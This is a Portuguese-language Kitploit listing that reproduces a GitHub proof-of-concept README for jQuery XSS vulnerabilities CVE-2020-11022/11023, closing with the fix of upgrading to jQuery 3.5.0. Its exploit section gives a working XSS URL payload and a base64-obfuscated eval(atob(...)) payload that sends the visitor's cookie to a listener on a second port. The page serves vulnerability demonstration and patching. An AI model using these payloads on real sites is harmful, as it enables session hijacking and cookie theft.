Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2020-11022-CVE-2020-11023 — Pequena coisa montada rapidamente para demonstrar esta CVE | Kitploit
Ferramentas/GitHubGitHub/0xaj2k/cve-2020-11022-cve-2020-11023
Ferramentas de PhishingAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebAprendizado e Educação
GitHub0xaj2k/cve-2020-11022-cve-2020-11023

CVE-2020-11022-CVE-2020-11023

Pequena coisa montada rapidamente para demonstrar esta CVE

Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
35412há 3 anosRevisado pelo Kitploit

CVE-2020-11022 CVE-2020-11023

Nas versões do jQuery maiores ou iguais a 1.2 e anteriores a 3.5.0, passar HTML de fontes não confiáveis – mesmo após sanitizá-lo – para um dos métodos de manipulação do DOM do jQuery (ou seja, .html(), .append() e outros) pode executar código não confiável. Este problema foi corrigido no jQuery 3.5.0.

Nas versões do jQuery maiores ou iguais a 1.0.3 e anteriores a 3.5.0, passar HTML contendo elementos de fontes não confiáveis – mesmo após sanitizá-lo – para um dos métodos de manipulação do DOM do jQuery (ou seja, .html(), .append() e outros) pode executar código não confiável. Este problema foi corrigido no jQuery 3.5.0.

Exploit

  1. Hospede a página index.php em um servidor web PHP. Sugiro usar sudo php -S 127.0.0.1:80 para iniciar um servidor rápido.

XSS Simples

  1. Visite o caminho http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=alert(1)%3E
  2. Pressione o botão "Append via .html()".
  3. Veja o alerta aparecer.

imagem

Roubo de cookies

  1. Inicie outro servidor web na porta 8085. Sugiro usar Python para isso: sudo python3 -m http.server 8085
  2. Visite o caminho http://127.0.0.1/?value=/%3E%3Cimg%20src=x%20onerror=eval(atob(%27ZG9jdW1lbnQubG9jYXRpb249Imh0dHA6Ly8xMjcuMC4wLjE6ODA4NS8/Yz0iK2RvY3VtZW50LmNvb2tpZQ==%27))%3E
  3. Pressione o botão "Append via .html()".
  4. Verifique os logs do Python e veja seu cookie no log.

imagem

Correção

Se você quiser corrigir este CVE neste script, basta alterar a versão do jQuery para https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.0/jquery.js :)

Baixar ferramenta